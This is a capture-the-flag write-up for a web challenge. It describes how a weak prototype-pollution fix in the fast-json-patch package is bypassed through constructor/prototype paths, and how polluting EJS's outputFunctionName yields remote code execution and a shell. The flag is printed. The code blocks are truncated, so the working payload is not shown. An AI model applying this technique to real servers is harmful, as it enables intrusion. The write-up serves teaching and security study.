tl;dr
- Using Prototype pollution vulnerablity in fast-json-patch pollute value in outputFunctionName
- Get a shell as the flag can only be obtained using binary file
No. Of Solves: 78
Challenge points: 151
Solved By: 1nt3rc3pt0r, Captain-Kay
Challenge Description
Laura just found a website used for monitoring security mechanisms on Rhiza’s state and is planning to hack into it to forge the status of these security services. After that she will desactivate these security resources without alerting government agents. Your goal is to get into the server to change the monitoring service behavior.
Source Code: here
Analysis
We have a list of service and status in index.js
.
1 | let services = { |
End point /change_status
is used to update status of services , this is done with the help of package called fast-json-patch
.
1 | app.post("/change_status", (req, res) => { |
fast-json-patch
initially had vulnerablity regarding Prototype pollution and it was said to be fixed in the current version that we use in challenge.
1 | if (banPrototypeModifications && key == '__proto__') { |
The Patch was not good enough to prevent Prototype pollution as they check for existance of __proto__
there still exists a chance for Prototype pollution using prototype
Check Here
Solution
Now we can overwrite values as we need using constructor/prototype/<variable>
.
RCE using Prototype pollution
we have ejs as template engine and injecting code to outputFunctionName
in ejs.js
can lead to RCE Check Here
1 | if (opts.outputFunctionName) { |
Exploit Script
1 | import requests |
Flag
1 | CTF-BR{d0nt_miX_pr0totyPe_pol1ution_w1th_a_t3mplat3_3ng1nE!} |